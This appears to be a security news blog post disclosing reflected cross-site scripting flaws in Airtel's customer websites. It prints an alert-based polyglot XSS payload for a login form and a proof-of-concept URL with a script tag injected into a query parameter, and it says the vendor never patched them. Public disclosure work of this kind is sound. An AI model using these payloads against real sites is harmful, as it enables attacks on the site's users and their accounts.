Multiple Cross Site Scripting Vulnerability in Airtel website

Sponsored Links
A Security Researcher Vedachala who got acknowledged by PayPal, Zynga and more sites, has discovered a Reflected Cross Site scripting vulnerability in the India's leading telecommunications services provider, Airtel(airtel.com)

The researcher found that Username and Password field in this page "ebpp.airtelworld.com/myaccount" are vulnerable to XSS attack. This vulnerability is POST request based xss.

When you enter the this code in the username field with any password , it results in XSS :

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

The researcher has claimed to have found XSS on BSNL, Tatadocomo and 000webhost. He also claimed that he reported about vulnerability to Airtel but they failed to respond.

Recently,  I(Sabari Selvan aka BreakTheSec) discovered a XSS vulnerability in Airtel website and  reported to them.  It seems like they neither reply nor patch the vulnerability , So it is better to publish my finding in this same post itself.


The POC code for my finding:
http://www.airtel.in/wps/wcm/connect/airtel.in/airtel.in/home/foryou/mobile/prepaid+services/reach+airtel/PG_FY_MB_Prepaid_ReachAirtel/?page=cs_m&CIRCLE=2&CIRCLENAME="><script>alert("BreakTheSec")</script>
Category: / / /

Share this with Your friends:


About Author

, founder of E Hacking News, an Information Security enthusiast who has more interest in PenTesting and Malware analysis. You can find him on Google+ Profile , Twitter and Facebook.